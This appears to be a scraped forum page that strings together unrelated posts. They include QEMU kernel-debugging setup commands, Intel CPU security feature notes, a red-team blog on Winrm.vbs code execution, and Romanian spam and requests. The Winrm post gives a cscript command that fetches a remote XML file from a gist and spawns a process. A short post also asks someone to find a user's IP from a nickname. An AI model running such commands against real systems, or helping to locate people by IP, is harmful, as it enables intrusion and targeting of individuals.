<BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 52:54:00:12:34:56 brd ff:ff:ff:ff:ff:ff inet6 fe80::5054:ff:fe12:3456/64 scope link valid_lft forever preferred_lft forever QEMU and the host can now communicate using their IPv6 Link-local addresses. After all, it is 2019. Copypasta # Building a minimal debuggable Kernel make defconfig make kvmconfig ./scripts/config -e CONFIG_DEBUG_INFO -d CONFIG_RANDOMIZE_BASE -d CONFIG_MODULES make olddefconfig make -j4 # Create root filesystem mkfs.ext4 rootfs.img mkdir mnt sudo mount -o loop rootfs.img mnt/ sudo debootstrap bionic mnt/ # Add following lines to mnt/etc/systemd/system/serial-getty@ttyS0.service.d/autologin.conf # START [Service] ExecStart= ExecStart=-/sbin/agetty --noissue --autologin root %I $TERM Type=idle # END # Unmount the filesystem sudo umount mnt # Boot Kernel with root file system in QEMU qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda rw console=ttyS0" -s # Attach gdb gdb ./linux-4.20.6/vmlinux (gdb) target remote :1234 Sursa: https://www.anmolsarma.in/post/single-step-kernel/

Intel CPU security features huku edited this page on Jul 31, 2016 · 23 revisions Intel CPU security features List of Intel CPU security features along with short descriptions taken from the Intel manuals. WP (Write Protect) (PDF) Quoting Volume 3A, 4-3, Paragraph 4.1.3: CR0.WP allows pages to be protected from supervisor-mode writes. If CR0.WP = 0, supervisor-mode write accesses are allowed to linear addresses with read-only access rights; if CR0.WP = 1, they are not (User-mode write accesses are never allowed to linear addresses with read-only access rights, regardless of the value of CR0.WP). Interesting links: WP: Safe or Not? NXE/XD (No-Execute Enable/Execute Disable) (PDF) Regarding IA32_EFER MSR and NXE (Volume 3A, 4-3, Paragraph 4.1.3): IA32_EFER.NXE enables execute-disable access rights for PAE paging and IA-32e paging. If IA32_EFER.NXE = 1, instructions fetches can be prevented from specified linear addresses (even if data reads from the addresses are allowed). IA32_EFER.NXE has no effect with 32-bit paging. Software that wants to use this feature to limit instruction fetches from readable pages must use either PAE paging or IA-32e paging. Regarding XD (Volume 3A, 4-17, Table 4-11): If IA32_EFER.NXE = 1, execute-disable (if 1, instruction fetches are not allowed from the 4-KByte page controlled by this entry; see Section 4.6); otherwise, reserved (must be 0). SMAP (Supervisor Mode Access Protection) (PDF) Quoting Volume 3A, 4-3, Paragraph 4.1.3: CR4.SMAP allows pages to be protected from supervisor-mode data accesses. If CR4.SMAP = 1, software operating in supervisor mode cannot access data at linear addresses that are accessible in user mode. Software can override this protection by setting EFLAGS.AC. SMEP (Supervisor Mode Execution Protection) (PDF) Quoting Volume 3A, 4-3, Paragraph 4.1.3: CR4.SMEP allows pages to be protected from supervisor-mode instruction fetches. If CR4.SMEP = 1, software operating in supervisor mode cannot fetch instructions from linear addresses that are accessible in user mode. MPX (Memory Protection Extensions) (PDF) Intel MPX introduces new bounds registers and new instructions that operate on bounds registers. Intel MPX allows an OS to support user mode software (operating at CPL = 3) and supervisor mode software (CPL < 3) to add memory protection capability against buffer overrun. It provides controls to enable Intel MPX extensions for user mode and supervisor mode independently. Intel MPX extensions are designed to allow software to associate bounds with pointers, and allow software to check memory references against the bounds associated with the pointer to prevent out of bound memory access (thus preventing buffer overflow). Interesting links: Intel MPX support in the GCC compiler Intel Memory Protection Extensions (Intel MPX) for Linux intel_mpx.txt in Linux Kernel documentation SGX (Software Guard Extensions) (PDF) These extensions allow an application to instantiate a protected container, referred to as an enclave. An enclave is a protected area in the application’s address space (see Figure 1-1), which provides confidentiality and integrity even in the presence of privileged malware. Accesses to the enclave memory area from any software not resident in the enclave are prevented. Interesting links: Intel Software Guard Extensions (SGX): A Researcher’s Primer CreateEnclave function at MSDN Protection keys (PDF) Quoting Volume 3A, 4-31, Paragraph 4.6.2: The protection-key feature provides an additional mechanism by which IA-32e paging controls access to user-mode addresses. When CR4.PKE = 1, every linear address is associated with the 4-bit protection key located in bits 62:59 of the paging-structure entry that mapped the page containing the linear address. The PKRU register determines, for each protection key, whether user-mode addresses with that protection key may be read or written. The following paragraphs, taken from LWN, shed some light on the purpose of memory protection keys: One might well wonder why this feature is needed when everything it does can be achieved with the memory-protection bits that already exist. The problem with the current bits is that they can be expensive to manipulate. A change requires invalidating translation lookaside buffer (TLB) entries across the entire system, which is bad enough, but changing the protections on a region of memory can require individually changing the page-table entries for thousands (or more) pages. Instead, once the protection keys are set, a region of memory can be enabled or disabled with a single register write. For any application that frequently changes the protections on regions of its address space, the performance improvement will be large. There is still the question (as asked by Ingo Molnar) of just why a process would want to make this kind of frequent memory-protection change. There would appear to be a few use cases driving this development. One is the handling of sensitive cryptographic data. A network-facing daemon could use a cryptographic key to encrypt data to be sent over the wire, then disable access to the memory holding the key (and the plain-text data) before writing the data out. At that point, there is no way that the daemon can leak the key or the plain text over the wire; protecting sensitive data in this way might also make applications a bit more resistant to attack. Another commonly mentioned use case is to protect regions of data from being corrupted by "stray" write operations. An in-memory database could prevent writes to the actual data most of the time, enabling them only briefly when an actual change needs to be made. In this way, database corruption due to bugs could be fended off, at least some of the time. Ingo was unconvinced by this use case; he suggested that a 64-bit address space should be big enough to hide data in and protect it from corruption. He also suggested that a version of mprotect() that optionally skipped TLB invalidation could address many of the performance issues, especially if huge pages were used. Alan Cox responded, though, that there is real-world demand for the ability to change protection on gigabytes of memory at a time, and that mprotect() is simply too slow. CET (Control-flow Enforcement Technology) (PDF) Control-flow Enforcement Technology (CET) provides the following capabilities to defend against ROP/JOP style control-flow subversion attacks: Shadow Stack – return address protection to defend against Return Oriented Programming, Indirect branch tracking – free branch protection to defend against Jump/Call Oriented Programming. Sursa: https://github.com/huku-/research/wiki/Intel-CPU-security-features

PentestHardware Kinda useful notes collated together publicly Comments and Fixes - some very kind people have begun to proofread this as I am writing it. It's still a long way from being finished, but comments are always welcome. Make an issue and provide comments in-PDF if you can. NB - this is very much a work in progress, released early for comments and feedback. Hoping to complete first full version by XMas 2018. For the current releases, this material is released under Creative Commons v3.0 - quote me all you like, and reference my work no problem, print copies for yourselves, but just leave my name on it. Sursa: https://github.com/unprovable/PentestHardware

Matt harr0ey Feb 2 Introduction This beginning alludes to give point simple concept related to using Winrm.vbs to do code executed by XML file so I could collect a few ideas we totally can use to do a simple method is being offered by the red team like Winrm.vbs is getting more popular so I found some things can’t waste any more time to release them, Winrm.vbs ==> Windows Remote Management Synopsis Winrm is simple service to manage your code execute or instruction on any systems via your computer using WS-Management protocol but this service isn’t being offered here in this a blog post I just give local execute but this may happen remotely if you connect with any servers or computers further information, https://docs.microsoft.com/en-us/windows/desktop/winrm/about-windows-remote-management Usage XML/Winrm.vbs First of all if you just heard about XML/Winrm.vbs here at this time when you saw this a blog post I would say, Yes this research winrm.vbs is totally different from any XML codes else so you can go to have a look at this Microsoft’s concept It gives good description to understand Winrm’s instruction to use So what’s the relationship between normal XML and Winrm XML I think the different from normal XML code and Winrm.vbs code is simple different between them there is something called normal XML is easy to understand but it doesn’t Winrm’s XML isn’t, but Winrm.vbs XML has different codes and different uses from normal XML so let’s go to have a look at picture contains a bit instruction related to WInrm’s XML code MS-Windows Remote management Small notes guys It’s better for you to take full privileges Open as administrator or if you use any platforms Empire Powershell or MSF you can go to get more high level than normal session but don’t forget to use Get-TokenPrvivs https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-TokenPrivs.ps1 Currently we have graphic inside a picture shows some information is beneficial for you how XML’s code is being implemented via XML instructions, but be careful because normal language XML cannot be used by Winrm.vbs I think we must use only Winrm’s XML language and Its version, These some instructions take you to how you can execute XML/Winrm.vbs via Cscript.exe although I found something else related to the same execute Winrm.vbs but It doesn’t work on my version windows but may works on Windows server2008 or others versions as well, if you have VM and Windows server2008 you can use this research remotely This text shows remote execute and next picture shows local execute cscript.exe winrm.vbs invoke Create wmicimv2/Win32_Process -SkipCAcheck -SkipCNcheck -remote:https://gist.githubuserconten t.com/homjxi0e/da3a5f4b5f48d60b156960bf27a4d164/raw/b615f853cf962566a516a320e9324fbfdcb124fc/PoCWinrm.xml Here you can look forward to seeing another new Winrm a blog post detected ( RedCanary ) Reference, Lateral Movement Using WinRM and WMI https://www.redcanary.com/blog/lateral-movement-winrm-wmi/ Sursa: https://medium.com/@mattharr0ey/round-of-use-winrm-code-execution-xml-6e3219d3e31

Pentru cei interesati sa studieze in Marea Britanie. Noi suntem Unistudy si oferim consiliere si asistenta pentru admiterea la institutii de invatamant superior din Marea Britanie, asta inseamna undergrad, master sau chiar PhD. Suntem parteneri cu peste o suta de universitati din UK si stim ce cauta acestea intr-un aplicant; de aceea va invitam sa apelati cu incredere la noi pentru orice informatii sau indrumare referitoare la aplicatiile UCAS, redactarea scrisorii de intentie si/sau pregatirea pentru interviu. Fireste, putem oferi consiliere personalizata si celor ambitiosi care si-ar dori sa aplice la medicina sau la alte cursuri al grupului universitatilor de top din Marea Britanie. De asemenea daca ati dori sa aflati mai multe informatii despre brexit sau despre noi si serviciile pe care le oferim nu ezitati sa ne contactati aici, pe siteul nostru sau pe pagina noastra de Facebook.

dupa aia incerc sa aflu mai multe cu nmap si ... alte teste nimic grav

Poate cineva sa-mi gaseasca ip=ul unui "nickname"? mai multe detalli nu am id este canada_56 .multumesc celui care ma ajuta

Daca doriti sa va apucati de dropshiping eu va propun acest curs : https://startaio.ro/?wpam_id=68 Eu de aici am invatat si am reusit sa fac mii de lei in cateva zile , din punctul meu de vedere este cel mai bun curs! ?GIVE IT A TRY ?